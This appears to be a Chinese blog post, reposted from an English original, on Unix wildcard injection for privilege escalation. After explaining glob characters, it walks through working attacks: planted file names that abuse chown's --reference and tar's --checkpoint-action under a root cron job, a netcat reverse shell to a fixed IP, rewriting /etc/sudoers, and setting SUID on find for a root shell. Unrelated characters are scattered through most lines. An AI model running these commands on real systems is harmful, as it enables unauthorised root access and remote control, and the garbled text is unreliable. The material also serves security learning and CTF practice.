通配符注入(Wildcard Injection)是一有趣的老式Unix黑客技術(shù)巴粪。
個人感覺秘遏,就是用“特殊的文件名”來輔助執(zhí)行命令项棠。
通配符
| 字符 | 含義 | 實例 |
|---|---|---|
* |
匹配 0 或多個字符 | a*b a與b之間可以有任意長度的任意字符, 也可以一個也沒有, 如aabcb, axyzb, a012b, ab匈庭。 |
? |
匹配任意一個字符 |
a?b a與b之間必須也只能有一個字符, 可以是任意字符, 如aab, abb, acb, a0b。 |
[list] |
匹配list中的任意單一字符 |
a[xyz]b a與b之間必須也只能有一個字符, 但只能是 x 或 y 或 z, 如: axb, ayb, azb僚害。 |
[^list] |
匹配除list中的任意單一字符 |
a[^0-9]b a與b之間必須也只能有一個字符, 但不能是阿拉伯?dāng)?shù)字, 如axb, aab, a-b禽绪。 |
[c1-c2] |
匹配c1-c2中的任意單一字符如:[0-9] [a-z]
|
a[0-9]b 0與9之間必須也只能有一個字符闸度,如a0b, a1b... a9b猾骡。 |
{string1,string2,...} |
匹配sring1或string2(或更多)其中一字符串 |
a{abc,xyz,123}b a與b之間只能是abc或xyz或123這三個字符串之一瑞躺。 |
[]的特殊例子
[]:匹配范圍
[^]:排除匹配范圍
[:alnum:]:所有字母和數(shù)字
[:alpha:]:所有字母
[:digit:]:所有數(shù)字
[:lower:]:所有小寫字母
[:upper:]:所有大寫字母
[:blank:]:空白字符和TAB制表符
[:space:]:包括空白字符、TAB制表符(\t)兴想、換頁(\f)
[:cntrl:]:所有控制字符
[:graph:]:可打印并可看到的字符幢哨。空格是可打印的嫂便,但是不是可看到的捞镰。
[:print:]:所有可打印字符
[:punct:]:所有標點符號,非字母毙替、數(shù)字岸售、控制字符和space字符。
[:xdigit:]:十六進制數(shù)的字符厂画。
特殊變量
IFS 分隔符凸丸,<space>或<tab>或<enter>三者之一組成(我們常用space)。
CR 由<enter>產(chǎn)生袱院。
簡單的實例1
首先建立3個文件屎慢,各自寫入了一行內(nèi)容
cd /Desktop
mkdir wild
cd wild
echo "Hello Friends" > file1
echo "This is Wildcard Injection" > file2
echo "take help" > --help
之后用cat命令查看這些文件
cat file1
cat file 2
cat --help
前兩個是不會有異常的,但是在嘗試讀取--help這個文件的時候忽洛,顯示的不是take help腻惠,而是從自己的庫中調(diào)用自己的-help選項,這種類型的技巧稱為Wildcard wildness欲虚。
通過Chown劫持文件所有者
利用chown命令可以改變文件的所有者集灌,一般用戶沒有普通權(quán)限更改別人文件的所有者,除了root复哆。
超級管理員用戶 (root) – 執(zhí)行chown命令欣喧。
非root用戶1(raj) – 執(zhí)行普通任務(wù),如創(chuàng)建文件
非root用戶2(aarti) – 執(zhí)行普通任務(wù)寂恬,如創(chuàng)建文件
惡意用戶(Ignite) – 注入chown命令
在下圖中你可以看到续誉,所有PHP文件的所有者均為raj用戶。
chown有個參數(shù)--reference初肉,作用如下酷鸦,
With --reference, change the owner and group of each FILE to those of RFILE.“克隆”參考文件的權(quán)限到你指定的文件或目錄上。
cd
ls -al
echo "" > my.php
echo > --reference=my.php
當(dāng)root用戶使用通配符*修改所有PHP文件所有權(quán)時牙咏,ignite用戶將取得所有文件間接所有權(quán)臼隔。
chown -R aarti:aarti *.php
ls -al
tar命令的利用
創(chuàng)建一些文件,然后用crontab命令定時備份
nano /etc/crontab
*/1 * * * * root tar -zcf /var/backups/html.tgz /var/www/html/*
crontab和tar通配符注入
假設(shè)現(xiàn)在以一個普通用戶的身份登陸終端妄壶,嘗試提權(quán)到root摔握。然后cat /etc/crontab查看計劃任務(wù)。
本機用msfvenom生成一個netcat反彈語句
msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.102 lport=8888 R
然后復(fù)制到ssh中丁寄,cd到要打包的目錄中
echo "mkfifo /tmp/lhennp; nc 192.168.1.102 8888 0</tmp/lhennp | /bin/sh >/tmp/lhennp 2>&1; rm /tmp/lhennp" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1
可以先執(zhí)行tar cf archive.tar *看看觸發(fā)的效果氨淌,crontab中的tar是root權(quán)限運行的泊愧,所以就等著反彈root會話吧。
--checkpoint[=NUM??BER] (翻譯起來繞口) 按百分幾顯示處理進度盛正?
--checkpoint-action = ACTION 在每個檢查點上執(zhí)行指定的操作
有錯誤的第二個例子
原作者是這樣子的
cd /tmp
mkdir data
chmod 777 data
cd data
echo "" > f1
echo "" > f2
echo "" > f3
在其他目錄中編寫一個bash腳本删咱,tar打包/tmp/data。
mkdir info
cd info
nano script.sh
chmod 777 script.sh
注意豪筝,這個shell的內(nèi)容是這樣的
#!/bin/bash
cd /tmp/data
tar cf /backup/backup.tgz *
手動執(zhí)行這個腳本就會發(fā)現(xiàn)痰滋,根本不會自動切換到/tmp/data目錄。
這是因為shell在執(zhí)行腳本時续崖,會創(chuàng)建一個子shell敲街,并在子shell中逐個執(zhí)行腳本中的指令。 在子shell中已經(jīng)切換了目錄了严望,但是子shell一旦執(zhí)行完多艇,馬上退出,子shell中的變量和操作全部都收回著蟹。回到終端根本就看不到這個過程的變化墩蔓。
解決辦法
執(zhí)行
source c.sh,這時候就是直接在終端的shell執(zhí)行腳本了萧豆,沒有生成子shell奸披,執(zhí)行的結(jié)果就是輸出歷史命令,并且切換了目錄涮雷。
每次都要輸入source是一件煩瑣的事情阵面,其實source命令又叫點命令,所以執(zhí)行. ./c.sh是一樣的效果洪鸭,注意:.和.中間有個空格样刷!
tar+crontab+sudoers
就是用crontab改了sudoers文件的內(nèi)容
echo 'echo "ignite ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > demo.sh
echo "" > "--checkpoint-action=exec=sh demo.sh"
echo "" > --checkpoint=1
tar cf archive.tar *
tar+crontab+suid
圖略,就是用crontab改變文件的suid實現(xiàn)提權(quán)
echo "chmod u+s /usr/bin/find" > test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
tar cf archive.tar *
ls -al /usr/bin/find
find f1 -exec "whoami" \;
root
find f1 -exec "/bin/sh" \;
id
whoami
在ctf中的利用
看完上面的通配符注入览爵,再看看這個置鼻,p神博客寫的無字母數(shù)字webshell之提高篇
覺得看不夠的話還可以接著看下面這兩個
【CTF 攻略】如何繞過四個字符限制getshell
https://www.anquanke.com/post/id/87203
命令注入突破長度限制
https://www.freebuf.com/articles/web/154453.html
注意,代碼不能隨便亂插蜓竹,否則就被審核了
原文:https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/
